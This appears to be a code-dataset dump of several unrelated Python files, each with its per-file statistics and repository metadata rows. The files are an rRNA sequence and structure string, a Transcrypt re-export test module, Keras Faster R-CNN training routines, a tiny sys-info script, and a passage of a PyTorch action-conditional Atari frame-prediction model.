seq_16S = "AAAUUGAAGAGUUUGAUCAUGGCUCAGAUUGAACGCUGGCGGCAGGCCUAACACAUGCAAGUCGAACGGUAACAGGAAGAAGCUUGCUUCUUUGCUGACGAGUGGCGGACGGGUGAGUAAUGUCUGGGAAACUGCCUGAUGGAGGGGGAUAACUACUGGAAACGGUAGCUAAUACCGCAUAACGUCGCAAGACCAAAGAGGGGGACCUUCGGGCCUCUUGCCAUCGGAUGUGCCCAGAUGGGAUUAGCUAGUAGGUGGGGUAACGGCUCACCUAGGCGACGAUCCCUAGCUGGUCUGAGAGGAUGACCAGCCACACUGGAACUGAGACACGGUCCAGACUCCUACGGGAGGCAGCAGUGGGGAAUAUUGCACAAUGGGCGCAAGCCUGAUGCAGCCAUGCCGCGUGUAUGAAGAAGGCCUUCGGGUUGUAAAGUACUUUCAGCGGGGAGGAAGGGAGUAAAGUUAAUACCUUUGCUCAUUGACGUUACCCGCAGAAGAAGCACCGGCUAACUCCGUGCCAGCAGCCGCGGUAAUACGGAGGGUGCAAGCGUUAAUCGGAAUUACUGGGCGUAAAGCGCACGCAGGCGGUUUGUUAAGUCAGAUGUGAAAUCCCCGGGCUCAACCUGGGAACUGCAUCUGAUACUGGCAAGCUUGAGUCUCGUAGAGGGGGGUAGAAUUCCAGGUGUAGCGGUGAAAUGCGUAGAGAUCUGGAGGAAUACCGGUGGCGAAGGCGGCCCCCUGGACGAAGACUGACGCUCAGGUGCGAAAGCGUGGGGAGCAAACAGGAUUAGAUACCCUGGUAGUCCACGCCGUAAACGAUGUCGACUUGGAGGUUGUGCCCUUGAGGCGUGGCUUCCGGAGCUAACGCGUUAAGUCGACCGCCUGGGGAGUACGGCCGCAAGGUUAAAACUCAAAUGAAUUGACGGGGGCCCGCACAAGCGGUGGAGCAUGUGGUUUAAUUCGAUGCAACGCGAAGAACCUUACCUGGUCUUGACAUCCACGGAAGUUUUCAGAGAUGAGAAUGUGCCUUCGGGAACCGUGAGACAGGUGCUGCAUGGCUGUCGUCAGCUCGUGUUGUGAAAUGUUGGGUUAAGUCCCGCAACGAGCGCAACCCUUAUCCUUUGUUGCCAGCGGUCCGGCCGGGAACUCAAAGGAGACUGCCAGUGAUAAACUGGAGGAAGGUGGGGAUGACGUCAAGUCAUCAUGGCCCUUACGACCAGGGCUACACACGUGCUACAAUGGCGCAUACAAAGAGAAGCGACCUCGCGAGAGCAAGCGGACCUCAUAAAGUGCGUCGUAGUCCGGAUUGGAGUCUGCAACUCGACUCCAUGAAGUCGGAAUCGCUAGUAAUCGUGGAUCAGAAUGCCACGGUGAAUACGUUCCCGGGCCUUGUACACACCGCCCGUCACACCAUGGGAGUGGGUUGCAAAAGAAGUAGGUAGCUUAACCUUCGGGAGGGCGCUUACCACUUUGUGAUUCAUGACUGGGGUGAAGUCGUAACAAGGUAACCGUAGGGGAACCUGCGGUUGGAUCACCUCCUUA"
struct_16S = "........((((..[.[[[..)))).((((.(((((..(((((((((....(((.(((..(((..((.((..(((.(..(((....)))..)..)))))..)))))......(((......(((((((..((...(((((((.(.((.....((((((....))))))......)).).....(((....)))....((((((..(......))))))).)))))))..)).)))))))(((....(((..((((((((.......)))))))))))......)))..((((((((....))))...))))))).(((((............))))).((((....))))...)))))).).....(.(((...(((((....)))).))))).)).))))))..((((......((((....)))).....))))..((.(((((...(..(.((((((((.......)))))))).)...)....)))))....)).((((([[[...(((((.....((.]]])).......))))))))))..)))))))))..........((([[...(.((((...(((.(((((((.((((((((((......((((((.....))))))....))))))))..)))))))))..(((((((((...((((((((...((((((((...((........))......))))))))...).......((....)).)))))))..)))).))))..))))...))))....((((((...((...((((.........))))...))))))))......{...((((((..((((((((((((.....))))))))))))...((..]])).....)))))))))).(((......((((....))))....)))...]]].](((((.(((((((.((..(((((..((((((((((......((........))..........(((((((..(...(((((((.....(..........).......(....)...))))).))).((.(((...((((((.(....(((((((((....)))...(((......)))...)))))).....((((.(((((((...((..((.......))))....)))))))..(..(((((.....))))).....)..)))).....).).)))...)).)))))....)))))))...)).)))))))).(...((((((......(((..((...(((....)))...))....)))......))))))......(....(((((((........)))))))....)..)..))))).....(((((((.........)))))))......))...)))))))))).))..(.(..((.(.((((.(((..((((((((((((....((((((.((((..((....)).))))))))))...))))))))))))..))).))))..).))...)..)..(((((((((....)))))))))}.............".replace('[','.').replace(']','.').replace('{', '.').replace('}', '.').replace('<', '.').replace('>', '.')
| 1,074
| 1,663
| 0.496896
| 11
| 3,222
| 145.363636
| 0.454545
| 0.043777
| 0.052533
| 0.052533
| 0.026266
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001246
| 0.004035
| 3,222
| 2
| 1,664
| 1,611
| 0.49704
| 0
| 0
| 0
| 0
| 0
| 0.960894
| 0.957169
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
fcbb02e01ff414e958efba19ea6eed17c0bdeed5
| 142
|
py
|
Python
|
mp_sort/virtenv/lib/python3.6/site-packages/transcrypt/development/automated_tests/transcrypt/div_pulls/pull575_reexport_modules/reexporter/__init__.py
|
ang-jason/fip_powerx_mini_projects-foxtrot
|
37e3671969b516369e2d1c7cab5890b75c489f56
|
[
"MIT"
] | 2,200
|
2016-10-12T16:47:13.000Z
|
2022-03-30T16:40:35.000Z
|
mp_sort/virtenv/lib/python3.6/site-packages/transcrypt/development/automated_tests/transcrypt/div_pulls/pull575_reexport_modules/reexporter/__init__.py
|
ang-jason/fip_powerx_mini_projects-foxtrot
|
37e3671969b516369e2d1c7cab5890b75c489f56
|
[
"MIT"
] | 672
|
2016-10-12T16:36:48.000Z
|
2022-03-25T00:57:04.000Z
|
mp_sort/virtenv/lib/python3.6/site-packages/transcrypt/development/automated_tests/transcrypt/div_pulls/pull575_reexport_modules/reexporter/__init__.py
|
ang-jason/fip_powerx_mini_projects-foxtrot
|
37e3671969b516369e2d1c7cab5890b75c489f56
|
[
"MIT"
] | 230
|
2016-10-20T14:31:40.000Z
|
2022-03-16T15:57:15.000Z
|
from div_pulls.pull575_reexport_modules.reexporter.html5.html5 import *
from div_pulls.pull575_reexport_modules.reexporter.html5 import ext
| 47.333333
| 72
| 0.873239
| 20
| 142
| 5.9
| 0.5
| 0.118644
| 0.20339
| 0.322034
| 0.830508
| 0.830508
| 0.830508
| 0.830508
| 0
| 0
| 0
| 0.068182
| 0.070423
| 142
| 2
| 73
| 71
| 0.825758
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
fcdad3b8b4c3114bd9e639c4f4e0571955e195a4
| 10,251
|
py
|
Python
|
faster_rcnn/train_util.py
|
Kelicious/faster_rcnn
|
fde1a2f342855b8a3b6c1a54878e59d29102a26d
|
[
"MIT"
] | 18
|
2018-05-13T14:50:03.000Z
|
2022-02-23T14:27:17.000Z
|
faster_rcnn/train_util.py
|
Kelicious/faster_rcnn
|
fde1a2f342855b8a3b6c1a54878e59d29102a26d
|
[
"MIT"
] | 3
|
2018-05-15T08:46:10.000Z
|
2020-03-17T12:46:31.000Z
|
faster_rcnn/train_util.py
|
Kelicious/faster_rcnn
|
fde1a2f342855b8a3b6c1a54878e59d29102a26d
|
[
"MIT"
] | 15
|
2018-05-13T14:50:24.000Z
|
2022-02-24T09:50:07.000Z
|
import random
import timeit
from keras import backend as K
from loss_functions import cls_loss_rpn, bbreg_loss_rpn, cls_loss_det, bbreg_loss_det
from shared_constants import DEFAULT_NUM_ITERATIONS, DEFAULT_LEARN_RATE
def train_rpn(rpn_model, images, training_manager, optimizer, phases=[[DEFAULT_NUM_ITERATIONS, DEFAULT_LEARN_RATE]],
save_frequency=None, save_weights_dest=None, save_model_dest=None):
"""
Trains a region proposal network.
:param rpn_model: Keras model for the rpn to be trained.
:param images: sequence of shapes.Image objects used to train the network.
:param training_manager: rpn_util.RpnTrainingManager to produce training inputs from images.
:param optimizer: keras.optimizers.Optimizer implementation to be used. Doesn't need a preconfigured learning rate.
:param phases: list of lists specifying the learning rate schedule, e.g. [[1000, 1e-3], [100, 1e-4]] 1000 iterations
with learning rate 1e-3 followed by 100 iterations with learning rate 1e-4.
:param save_frequency: positive integer specifying how many iterations occur between saving the model's state. Leave
it as None to disable saving during training.
:param save_weights_dest: the path to save model weights as an h5 file after each save_frequency iterations.
:param save_model_dest: the path to save the Keras model as an h5 file after each save_frequency iterations.
:return: the rpn passed in.
"""
num_train = len(images)
anchors_per_loc = len(training_manager.anchor_dims)
for phase_num, phase in enumerate(phases):
num_iterations, learn_rate = phase
optimizer.lr = K.variable(learn_rate, name='lr')
rpn_model.compile(optimizer=optimizer, loss=[cls_loss_rpn(anchors_per_loc=anchors_per_loc),
bbreg_loss_rpn(anchors_per_loc=anchors_per_loc)])
print("Starting phase {} of training: {} iterations with learning rate {}".format(
phase_num, num_iterations, learn_rate))
for i in range(num_iterations):
img_idx = (i + num_iterations * phase_num) % num_train
if img_idx == 0:
random.shuffle(images)
img = images[img_idx]
print('Starting phase {} iteration {} with learn rate {}, training on image {}, flipped status: {}'.format(
phase_num, i, learn_rate, img.name, img.flipped))
print('img size: {}x{}'.format(img.width, img.height))
batched_img = training_manager.batched_image(img)
y_class, y_bbreg = training_manager.rpn_y_true(img)
start_time = timeit.default_timer()
loss_rpn = rpn_model.train_on_batch(batched_img, [y_class, y_bbreg])
print("model_rpn.train_on_batch time: ", timeit.default_timer() - start_time)
print('loss_rpn: {}'.format(loss_rpn))
if save_frequency and i % save_frequency == 0:
if save_weights_dest is not None:
rpn_model.save_weights(save_weights_dest)
print('Saved rpn weights to {}'.format(save_weights_dest))
if save_model_dest is not None:
rpn_model.save(save_model_dest)
print('Saved rpn model to {}'.format(save_model_dest))
return rpn_model
def train_detector_step2(detector, images, training_manager, optimizer,
phases=[[DEFAULT_NUM_ITERATIONS, DEFAULT_LEARN_RATE]], save_frequency=None,
save_weights_dest=None, save_model_dest=None):
"""
Trains a Fast R-CNN object detector for step 2 of the 4-step alternate training scheme in the paper.
:param detector: Keras model for the detector module used in step 2 of training. The model should accept images
and regions as inputs.
:param images: sequence of shapes.Image objects used to train the network.
:param training_manager: det_util.DetTrainingManager object to produce training inputs from images.
:param optimizer: keras.optimizers.Optimizer implementation to be used. Doesn't need a preconfigured learning rate.
:param phases: list of lists specifying the learning rate schedule, e.g. [[1000, 1e-3], [100, 1e-4]] 1000 iterations
with learning rate 1e-3 followed by 100 iterations with learning rate 1e-4.
:param save_frequency: positive integer specifying how many iterations occur between saving the model's state. Leave
it as None to disable saving during training.
:param save_weights_dest: the path to save model weights as an h5 file after each save_frequency iterations. Leave
this as None to disable weight saving during training.
:param save_model_dest: the path to save the Keras model as an h5 file after each save_frequency iterations. Leave
this as None to disable model saving during training.
:return: the detector passed in.
"""
num_train = len(images)
num_classes = len(training_manager.class_mapping) - 1
for phase_num, phase in enumerate(phases):
num_iterations, learn_rate = phase
optimizer.lr = K.variable(learn_rate, name='lr')
detector.compile(optimizer=optimizer, loss=[cls_loss_det, bbreg_loss_det(num_classes)])
print("Starting phase {} of training: {} iterations with learning rate {}".format(
phase_num, num_iterations, learn_rate))
for i in range(num_iterations):
img_idx = (i + num_iterations * phase_num) % num_train
if img_idx == 0:
random.shuffle(images)
img = images[img_idx]
print('Starting phase {} iteration {} with learn rate {}, training on image {}, flipped status: {}'.format(
phase_num, i, learn_rate, img.name, img.flipped))
batched_img, rois, y_class_num, y_transform = training_manager.get_training_input(img)
if rois is None:
print("Found no rois for this image")
continue
import timeit
start_time = timeit.default_timer()
loss_frcnn = detector.train_on_batch([batched_img, rois], [y_class_num, y_transform])
print("model_frcnn.train_on_batch time: ", timeit.default_timer() - start_time)
print('loss_frcnn: {}'.format(loss_frcnn))
if save_frequency and i > 0 and i % save_frequency == 0:
if save_weights_dest is not None:
detector.save_weights(save_weights_dest)
print('Saved detector weights to {}'.format(save_weights_dest))
if save_model_dest is not None:
detector.save(save_model_dest)
print('Saved detector model to {}'.format(save_model_dest))
return detector
def train_detector_step4(detector, images, training_manager, optimizer,
phases=[[DEFAULT_NUM_ITERATIONS, DEFAULT_LEARN_RATE]], save_frequency=None,
save_weights_dest=None, save_model_dest=None):
"""
Trains a Fast R-CNN object detector for step 4 of the 4-step alternate training scheme in the paper.
:param detector: Keras model for the detector module used in step 4 of training. The module should accept images'
convolutional features and regions as inputs.
:param images: sequence of shapes.Image objects used to train the network.
:param training_manager: det_util.DetTrainingManager object to produce training inputs from images.
:param optimizer: keras.optimizers.Optimizer implementation to be used. Doesn't need a preconfigured learning rate.
:param phases: list of lists specifying the learning rate schedule, e.g. [[1000, 1e-3], [100, 1e-4]] 1000 iterations
with learning rate 1e-3 followed by 100 iterations with learning rate 1e-4.
:param save_frequency: positive integer specifying how many iterations occur between saving the model's state. Leave
it as None to disable saving during training.
:param save_weights_dest: the path to save model weights as an h5 file after each save_frequency iterations. Leave
this as None to disable weight saving during training.
:param save_model_dest: the path to save the Keras model as an h5 file after each save_frequency iterations. Leave
this as None to disable model saving during training.
:return: the detector passed in.
"""
num_train = len(images)
num_classes = len(training_manager.class_mapping) - 1
for phase_num, phase in enumerate(phases):
num_iterations, learn_rate = phase
optimizer.lr = K.variable(learn_rate, name='lr')
detector.compile(optimizer=optimizer, loss=[cls_loss_det, bbreg_loss_det(num_classes)])
print("Starting phase {} of training: {} iterations with learning rate {}".format(
phase_num, num_iterations, learn_rate))
for i in range(num_iterations):
img_idx = (i + num_iterations * phase_num) % num_train
if img_idx == 0:
random.shuffle(images)
img = images[img_idx]
print('Starting phase {} iteration {} with learn rate {}, training on image {}, flipped status: {}'.format(
phase_num, i, learn_rate, img.name, img.flipped))
conv_features, rois, y_class_num, y_transform = training_manager.get_training_input(img)
if rois is None:
print("Found no training samples for this image")
continue
import timeit
start_time = timeit.default_timer()
loss_frcnn = detector.train_on_batch([conv_features, rois], [y_class_num, y_transform])
print("model_frcnn.train_on_batch time: ", timeit.default_timer() - start_time)
print('loss_frcnn: {}'.format(loss_frcnn))
if save_frequency and i > 0 and i % save_frequency == 0:
if save_weights_dest is not None:
detector.save_weights(save_weights_dest)
print('Saved detector weights to {}'.format(save_weights_dest))
if save_model_dest is not None:
detector.save(save_model_dest)
print('Saved detector model to {}'.format(save_model_dest))
return detector
| 52.840206
| 120
| 0.676324
| 1,377
| 10,251
| 4.831518
| 0.126362
| 0.025703
| 0.033819
| 0.035172
| 0.908613
| 0.896588
| 0.870585
| 0.860364
| 0.84383
| 0.84383
| 0
| 0.011657
| 0.246805
| 10,251
| 194
| 121
| 52.840206
| 0.850019
| 0.342015
| 0
| 0.731481
| 0
| 0
| 0.129737
| 0.011614
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0
| 0.064815
| 0
| 0.12037
| 0.194444
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e1b1f7483745b319a73dbae63902ada3ebdf969
| 46
|
py
|
Python
|
sys_info.py
|
MartianQXD/QBisim
|
322419e3aa24c7c09cd9341cbf2ac237279a59c8
|
[
"Apache-2.0"
] | 1
|
2021-07-21T07:23:51.000Z
|
2021-07-21T07:23:51.000Z
|
sys_info.py
|
MartianQXD/QBisim
|
322419e3aa24c7c09cd9341cbf2ac237279a59c8
|
[
"Apache-2.0"
] | null | null | null |
sys_info.py
|
MartianQXD/QBisim
|
322419e3aa24c7c09cd9341cbf2ac237279a59c8
|
[
"Apache-2.0"
] | null | null | null |
import sys
print(sys.version)
print(sys.path)
| 11.5
| 18
| 0.782609
| 8
| 46
| 4.5
| 0.625
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 46
| 4
| 19
| 11.5
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
1e440859df30fbcb911dbd25c37790c35fcaca6f
| 40,540
|
py
|
Python
|
model/action_conditional_video_prediction.py
|
mmendiet/DeepRL_pytorch
|
626e6c5290335ef320ca2d83f01c674f3a3ca8fc
|
[
"Apache-2.0"
] | null | null | null |
model/action_conditional_video_prediction.py
|
mmendiet/DeepRL_pytorch
|
626e6c5290335ef320ca2d83f01c674f3a3ca8fc
|
[
"Apache-2.0"
] | null | null | null |
model/action_conditional_video_prediction.py
|
mmendiet/DeepRL_pytorch
|
626e6c5290335ef320ca2d83f01c674f3a3ca8fc
|
[
"Apache-2.0"
] | null | null | null |
#######################################################################
# Copyright (C) 2017 Shangtong Zhang(zhangshangtong.cpp@gmail.com) #
# Permission given to modify the code as long as you keep this #
# declaration at the top #
#######################################################################
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import pickle
import torchvision
from skimage import io
from collections import deque, defaultdict
import gym
import torch.optim
from utils import *
from tqdm import tqdm
from network import *
import os
from statistics import mean
#PREFIX = '.'
# PREFIX = '/local/data'
PREFIX = '/1TB/Datasets/Atari/data_acvp2'
class Network(nn.Module, BasicNet):
def __init__(self, num_actions, gpu=0):
super(Network, self).__init__()
self.conv1 = nn.Conv2d(12, 64, 8, 2, (0, 1))
self.conv2 = nn.Conv2d(64, 128, 6, 2, (1, 1))
self.conv3 = nn.Conv2d(128, 128, 6, 2, (1, 1))
self.conv4 = nn.Conv2d(128, 128, 4, 2, (0, 0))
self.hidden_units = 128 * 11 * 8
self.fc5 = nn.Linear(self.hidden_units, 2048)
self.fc_encode = nn.Linear(2048, 2048)
self.fc_action = nn.Linear(num_actions, 2048)
self.fc_decode = nn.Linear(2048, 2048)
self.fc8 = nn.Linear(2048, self.hidden_units)
###
#self.fcr = nn.Linear(self.hidden_units,1)
###
self.deconv9 = nn.ConvTranspose2d(128, 128, 4, 2)
self.deconv10 = nn.ConvTranspose2d(128, 128, 6, 2, (1, 1))
self.deconv11 = nn.ConvTranspose2d(128, 128, 6, 2, (1, 1))#128 outchannels
self.deconv12 = nn.ConvTranspose2d(128, 3, 8, 2, (0, 1))#128
self.init_weights()
self.criterion = nn.MSELoss()
self.opt = torch.optim.Adam(self.parameters(), 1e-4)
BasicNet.__init__(self, gpu)
def init_weights(self):
for layer in self.children():
if isinstance(layer, nn.Conv2d) or isinstance(layer, nn.ConvTranspose2d):
nn.init.xavier_uniform(layer.weight.data)
nn.init.constant(layer.bias.data, 0)
nn.init.uniform(self.fc_encode.weight.data, -1, 1)
nn.init.uniform(self.fc_decode.weight.data, -1, 1)
nn.init.uniform(self.fc_action.weight.data, -0.1, 0.1)
def forward(self, obs, action):
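# Data flow (per the layers defined in __init__): obs with 12 channels (4 stacked
# RGB frames) is encoded by four conv layers down to a 128 x 11 x 8 feature map,
# flattened and projected to a 2048-d code; the action one-hot is embedded to
# 2048-d and gates the code via element-wise multiplication; the gated code is
# decoded through fc8 and four transposed convolutions to a 3-channel next frame.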
x = F.relu(self.conv1(obs))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = F.relu(self.conv4(x))
x = x.view((-1, self.hidden_units))
x = F.relu(self.fc5(x))
x = self.fc_encode(x)
action = self.fc_action(action)
x = torch.mul(x, action)
x = self.fc_decode(x)
x = F.relu(self.fc8(x))
x = x.view((-1, 128, 11, 8))
x = F.relu(self.deconv9(x))
x = F.relu(self.deconv10(x))
x = F.relu(self.deconv11(x))
x = self.deconv12(x)
return x
# def forward(self, obs, action):
# x1 = F.relu(self.conv1(obs))
# x2 = F.relu(self.conv2(x1))
# x3 = F.relu(self.conv3(x2))
# x4 = F.relu(self.conv4(x3))
# x = x4.view((-1, self.hidden_units))
# x = F.relu(self.fc5(x))
# x = self.fc_encode(x)
# action = self.fc_action(action)
# x = torch.mul(x, action)
# x = self.fc_decode(x)
# x = F.relu(self.fc8(x))
# ###
# #rew = self.fcr(x)
# ###
# x = x.view((-1, 128, 11, 8))
# x9 = F.relu(self.deconv9(x+x4))
# x10 = F.relu(self.deconv10(x9+x3))
# x11 = F.relu(self.deconv11(x10+x2))
# x12 = self.deconv12(x11+x1)
# return x12
# #return x12, rew
def fit(self, x, a, y):
x = self.variable(x)
a = self.variable(a)
y = self.variable(y)
y_ = self.forward(x, a)
loss = self.criterion(y_, y)
self.opt.zero_grad()
loss.backward()
for param in self.parameters():
param.grad.data.clamp_(-0.1, 0.1)
self.opt.step()
return np.asscalar(loss.cpu().data.numpy())
def evaluate(self, x, a, y):
x = self.variable(x)
a = self.variable(a)
y = self.variable(y)
y_ = self.forward(x, a)
loss = self.criterion(y_, y)
return np.asscalar(loss.cpu().data.numpy())
def predict(self, x, a):
x = self.variable(x)
a = self.variable(a)
return self.forward(x, a).cpu().data.numpy()
def load_episode(game, ep, num_actions):
path = '%s/dataset/%s/%05d' % (PREFIX, game, ep)
with open('%s/action.bin' % (path), 'rb') as f:
actions = pickle.load(f)
num_frames = len(actions) + 1
frames = []
#start_frame = np.random.randint(1,num_frames-320)
for i in range(1, num_frames):
#for i in range(start_frame, start_frame+320):
frame = io.imread('%s/%05d.png' % (path, i))
frame = np.transpose(frame, (2, 0, 1))
frames.append(frame.astype(np.uint8))
actions = actions[1:]
#actions = actions[(start_frame+1):(start_frame+321)]
encoded_actions = np.zeros((len(actions), num_actions))
encoded_actions[np.arange(len(actions)), actions] = 1
return frames, encoded_actions
def extend_frames(frames, actions):
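# Slides a 4-frame window over the episode: each training input stacks the last
# 4 RGB frames (4 x 3 = 12 channels, matching conv1), the target is the following
# frame, and the first 3 actions are dropped so actions stay aligned with the
# stacked inputs.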
buffer = deque(maxlen=4)
extended_frames = []
targets = []
for i in range(len(frames) - 1):
buffer.append(frames[i])
if len(buffer) >= 4:
extended_frames.append(np.vstack(buffer))
targets.append(frames[i + 1])
actions = actions[3:, :]
return np.stack(extended_frames), actions, np.stack(targets)
def train(game):
env = gym.make(game)
num_actions = env.action_space.n
net = Network(num_actions)
with open('%s/dataset/%s/meta.bin' % (PREFIX, game), 'rb') as f:
meta = pickle.load(f)
episodes = meta['episodes']
mean_obs = meta['mean_obs']
def pre_process(x):
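# Normalizes either a stacked 12-channel input (mean image tiled 4x) or a single
# 3-channel frame: subtract the dataset mean observation, then divide by 255.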
if x.shape[1] == 12:
return (x - np.vstack([mean_obs] * 4)) / 255.0
elif x.shape[1] == 3:
return (x - mean_obs) / 255.0
else:
assert False
def post_process(y):
return (y * 255 + mean_obs).astype(np.uint8)
train_episodes = int(episodes * 0.95)
indices_train = np.arange(train_episodes)
iteration = 0
while True:
np.random.shuffle(indices_train)
for ep in indices_train:
frames, actions = load_episode(game, ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
batcher = Batcher(32, [frames, actions, targets])
batcher.shuffle()
while not batcher.end():
if iteration % 10000 == 0:
mkdir('data/acvp-sample')
losses = []
test_indices = range(train_episodes, episodes)
ep_to_print = np.random.choice(test_indices)
for test_ep in tqdm(test_indices):
frames, actions = load_episode(game, test_ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
test_batcher = Batcher(32, [frames, actions, targets])
while not test_batcher.end():
x, a, y = test_batcher.next_batch()
losses.append(net.evaluate(pre_process(x), a, pre_process(y)))
if test_ep == ep_to_print:
test_batcher.reset()
x, a, y = test_batcher.next_batch()
y_ = post_process(net.predict(pre_process(x), a))
torchvision.utils.save_image(torch.from_numpy(y), 'data/acvp-sample/%s-%09d-truth.png' % (game, iteration))
torchvision.utils.save_image(torch.from_numpy(y_), 'data/acvp-sample/%s-%09d.png' % (game, iteration))
logger.info('Iteration %d, test loss %f' % (iteration, np.mean(losses)))
torch.save(net.state_dict(), 'data/acvp-%s.bin' % (game))
x, a, y = batcher.next_batch()
loss = net.fit(pre_process(x), a, pre_process(y))
if iteration % 100 == 0:
logger.info('Iteration %d, loss %f' % (iteration, loss))
iteration += 1
def trainSingleGame(game, numEpoch, batchSize, trainingSize, num_actions):
#env = gym.make(game)
#num_actions = env.action_space.n
#num_actions = 18
net = Network(num_actions)
#Look for checkpoint
gameDir = 'resultsNew2/'+game+str(trainingSize)+'pre'
print(gameDir)
sampleDir = gameDir+ '/samples'
modelDir = gameDir+'/models'
#pretrained = modelDir+'/acvp-'+game+'-08.bin'
pretrained = 'resultsNew2/PongBowl2'+str(num_actions)+'/models/acvp-PongBowl2-09.bin'
if os.path.exists(pretrained):
net.load_state_dict(torch.load(pretrained))
print("Grabbed Pretrained:" + pretrained)
#net.load_state_dict(torch.load('/home/matias/Documents/fall2019/rl/DeepRL_pytorch/results/MultiPB6/models/acvp-MultiPB-19.bin'))
with open('%s/dataset/%s/meta.bin' % (PREFIX, game), 'rb') as f:
meta = pickle.load(f)
episodes = meta['episodes']
mean_obs = meta['mean_obs']
def pre_process(x):
if x.shape[1] == 12:
return (x - np.vstack([mean_obs] * 4)) / 255.0
elif x.shape[1] == 3:
return (x - mean_obs) / 255.0
else:
assert False
def post_process(y):
return (y * 255 + mean_obs).astype(np.uint8)
trainSplit = float(trainingSize/100)
train_episodes = int(episodes * trainSplit)
#test_episodes = episodes - int(episodes *(1-trainSplit))
test_episodes = episodes - int(episodes *(1-0.89))
indices_train = np.arange(train_episodes)
iteration = 0
mkdir(gameDir)
mkdir(sampleDir)
mkdir(modelDir)
for epoch in range(0,numEpoch):
print("Starting Epoch: " + str(epoch))
#start Training
np.random.shuffle(indices_train)
for ep in indices_train:
frames, actions = load_episode(game, ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
batcher = Batcher(batchSize, [frames, actions, targets])
batcher.shuffle()
while not batcher.end():
x, a, y = batcher.next_batch()
loss = net.fit(pre_process(x), a, pre_process(y))
#print(iteration)
if iteration % 100 == 0:
logger.info('Iteration %d, loss %f' % (iteration, loss))
iteration += 1
#Save model every epoch
losses = []
test_indices = range(test_episodes, episodes)
ep_to_print = np.random.choice(test_indices)
for test_ep in tqdm(test_indices):
frames, actions = load_episode(game, test_ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
test_batcher = Batcher(batchSize, [frames, actions, targets])
while not test_batcher.end():
x, a, y = test_batcher.next_batch()
losses.append(net.evaluate(pre_process(x), a, pre_process(y)))
if test_ep == ep_to_print:
test_batcher.reset()
x, a, y = test_batcher.next_batch()
y_ = post_process(net.predict(pre_process(x), a))
torchvision.utils.save_image(torch.from_numpy(x[0:32,9:12]), sampleDir+'/%s-%02d-input.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y[0:32]), sampleDir+'/%s-%02d-truth.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y_[0:32]), sampleDir+'/%s-%02d.png' % (game, epoch))
logger.info('Epoch %d, test loss %f' % (epoch, mean(losses)))
f = open(gameDir+ '/results.txt', 'a')
f.write('Epoch: ' + str(epoch)+ ', test loss: ' + str(mean(losses))+ '\n')
f.close()
torch.save(net.state_dict(), modelDir+'/acvp-%s-%02d.bin' % (game, epoch))
def trainSingleGameTorch(game, numEpoch, batchSize, trainingSize):
env = gym.make(game)
num_actions = env.action_space.n
net = Network(num_actions)
#Look for checkpoint
gameDir = 'results/'+game+str(trainingSize)
sampleDir = gameDir+ '/samples'
modelDir = gameDir+'/models'
pretrained = modelDir+'/acvp-'+game+str(trainingSize)+'.bin'
if os.path.exists(pretrained):
net.load_state_dict(torch.load(pretrained))
with open('%s/dataset/%s/meta.bin' % (PREFIX, game), 'rb') as f:
meta = pickle.load(f)
episodes = meta['episodes']
mean_obs = meta['mean_obs']
def pre_process(x):
if x.shape[1] == 12:
return (x - np.vstack([mean_obs] * 4)) / 255.0
elif x.shape[1] == 3:
return (x - mean_obs) / 255.0
else:
assert False
def post_process(y):
return (y * 255 + mean_obs).astype(np.uint8)
train_episodes = int(episodes * float(trainingSize/100))
test_episodes = episodes - int(episodes *0.1)
indices_train = np.arange(train_episodes)
iteration = 0
mkdir(gameDir)
mkdir(sampleDir)
mkdir(modelDir)
first_visit = 1
for ep in indices_train:
frames, actions = load_episode(game, ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
if first_visit:
all_frames = torch.from_numpy(frames)
all_actions = torch.from_numpy(actions)
all_targets = torch.from_numpy(targets)
first_visit = 0
else:
all_frames = torch.cat((all_frames,torch.from_numpy(frames)))
all_actions = torch.cat((all_actions,torch.from_numpy(actions)))
all_targets = torch.cat((all_targets,torch.from_numpy(targets)))
training_set = torch.utils.data.TensorDataset(all_frames, all_actions, all_targets)
training_loader = torch.utils.data.DataLoader(training_set, batch_size=batchSize, shuffle=True,
num_workers=12, pin_memory=True)
